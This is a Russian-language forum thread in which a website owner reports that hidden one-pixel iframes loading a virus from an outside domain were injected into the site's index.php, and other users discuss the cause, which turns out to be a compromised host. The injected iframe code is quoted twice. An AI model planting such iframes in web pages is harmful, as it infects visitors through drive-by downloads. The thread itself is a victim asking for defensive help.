Взлом

[nutt]

Была проблема:

На главной странице сайта [Только зарегистрированные пользователи могут видеть ссылки. ] размещен код, вызывающий
загрузку и запуск вируса с другого ресурса. Вот этот код:

<iframe src="ltraffic.biz/resource.php?id=158&user=xpass" width=1 height=1>
</iframe><iframe src="ltraffic.biz/resource.php?id=158&user=xpass" width=1 height=1>
</iframe><iframe src="ltraffic.biz/resource.php?id=158&user=xpass" width=1 height=1>
</iframe>

С ltraffic.biz идет редирект на djhnxd..com/gr/in.php, откуда и
происходит загрузка.

Этот код был помещен в index.php. Как это делается? И как можно предотвратить дальнейшие нападки?

[Heathrow]

Originally posted by nutt@Oct 18 2006, 08:57
Была проблема:

На главной странице сайта [Только зарегистрированные пользователи могут видеть ссылки. ] размещен код, вызывающий
загрузку и запуск вируса с другого ресурса. Вот этот код:

<iframe src="ltraffic.biz/resource.php?id=158&user=xpass" width=1 height=1>
</iframe><iframe src="ltraffic.biz/resource.php?id=158&user=xpass" width=1 height=1>
</iframe><iframe src="ltraffic.biz/resource.php?id=158&user=xpass" width=1 height=1>
</iframe>

С ltraffic.biz идет редирект на djhnxd..com/gr/in.php, откуда и
происходит загрузка.

Этот код был помещен в index.php. Как это делается? И как можно предотвратить дальнейшие нападки?
<div align='right'>[Только зарегистрированные пользователи могут видеть ссылки. ]

[/quote]

Непонятно поставлен вопрос. Сайт ltraffic.biz был взломан и там был установлен редирект на вирус?

И вообще, не используй ifram&#39;ы так как многие бразузеры плюются на него. Юзай php или java инклюд.

[SoftDevelop]

сам скрипт index.php нужно смотреть
что там ? использовались какие-то формы, передавались параметры, были обращения к файлам?

[nutt]

Спасибо. Это хостинг взломали и во файлы дописали строки.